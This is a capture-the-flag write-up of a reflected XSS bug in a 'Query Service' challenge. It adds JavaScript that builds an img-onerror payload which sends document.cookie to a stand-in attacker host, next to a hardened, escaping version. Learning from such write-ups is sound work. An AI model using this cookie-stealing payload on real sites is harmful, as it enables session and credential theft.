Tags: xss web
Rating:
# Query Service
We can run queries against an SQL server, but we are given no information about it. Queries like `CREATE TABLE mytable (column1 int); INSERT INTO mytable (column1) VALUES (7); SELECT * FROM mytable;` run without error. The query is simply appended as a URL parameter to a GET request.
Notice that when a query is sent, the page fetches a `.db` file (`sql.db`). That file reveals information about a `notes` table, and `SELECT * FROM notes` returns:
```
submit link to admin bot at http://webp.bcactf.com:49155/
the flag is in the bot's "flag" cookie
```
The JavaScript of the page contains the following:
```javascript
if (searchParams.get("query")) {
    // untrusted value taken straight from the URL
    let query = searchParams.get("query");
    // innerHTML sink: the link back to this query is written as raw HTML
    linkdiv.innerHTML = "Link to this query: (link)";
}
```
This suggests that XSS is possible: the `query` parameter is reflected into the page through `innerHTML`, so a malicious "query link" sent to the admin bot should execute in its browser.
After tampering with the query parameter for a while and using https://requestbin.com/ as a collection endpoint, I was able to get the admin cookie with an `img` tag and an `onerror` attribute:
`CREATE TABLE mytable (column1 int);">`
Sending the link to the admin bot reveals the flag on https://requestbin.com/. This only works because the bot's `flag` cookie is readable from JavaScript; an `HttpOnly` cookie would not appear in `document.cookie`.
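The sink and the payload shape described above, as an added example that is not the challenge's own code. It assumes (the extracted snippet does not show this) that the page builds the link's `href` by concatenating the raw `query` value into the string assigned to `linkdiv.innerHTML`; `exfilUrl` is a placeholder for the attacker's RequestBin endpoint. The hardened builder beside it shows the fix: URL-encode the value that goes into the `href` and HTML-escape anything written into markup.

```javascript
// Added example, not code from the challenge page. Assumption: the page's link
// is produced by string concatenation like the vulnerable builder below.

// Vulnerable builder: the raw query parameter lands inside an attribute of
// markup that is then assigned to innerHTML.
function buildLinkHtmlVulnerable(query) {
  return `Link to this query: <a href="?query=${query}">link</a>`;
}

// Attacker payload in the shape the writeup describes: a harmless SQL statement,
// then `">` to close the href attribute and the <a> start tag, then an <img>
// whose onerror handler sends document.cookie to the attacker's endpoint.
// exfilUrl is a placeholder; document.cookie only contains cookies that are
// not HttpOnly.
function buildPayload(exfilUrl) {
  const handler = `fetch('${exfilUrl}?c='+encodeURIComponent(document.cookie))`;
  return `CREATE TABLE mytable (column1 int);"><img src=x onerror="${handler}">`;
}

// Minimal HTML escaper for text and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened builder: encodeURIComponent turns `"`, `<` and `>` into %22, %3C and
// %3E so the attribute cannot be closed, and escapeHtml guards the markup.
// In a real page, prefer document.createElement('a') plus a.href/a.textContent
// over building HTML strings at all.
function buildLinkHtmlSafe(query) {
  const href = '?query=' + encodeURIComponent(query);
  return `Link to this query: <a href="${escapeHtml(href)}">link</a>`;
}

// Crude illustration check: which start tags other than the intended <a>
// appear in the rendered markup? (A real parser would be needed for anything
// beyond this demonstration.)
function injectedTags(html) {
  const tags = html.match(/<([a-zA-Z][a-zA-Z0-9]*)/g) || [];
  return tags.map((t) => t.slice(1).toLowerCase()).filter((t) => t !== 'a');
}

// Usage: compare both builders on the same payload.
const payload = buildPayload('https://attacker.example/collect');
console.log(injectedTags(buildLinkHtmlVulnerable(payload))); // [ 'img' ]
console.log(injectedTags(buildLinkHtmlSafe(payload)));       // []
```

Because the payload begins with a syntactically valid statement, the query part still runs; only the tail after `;` is there to break out of the attribute. The hardened builder produces the same link for ordinary queries and neutralises the payload without rejecting it.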
Smart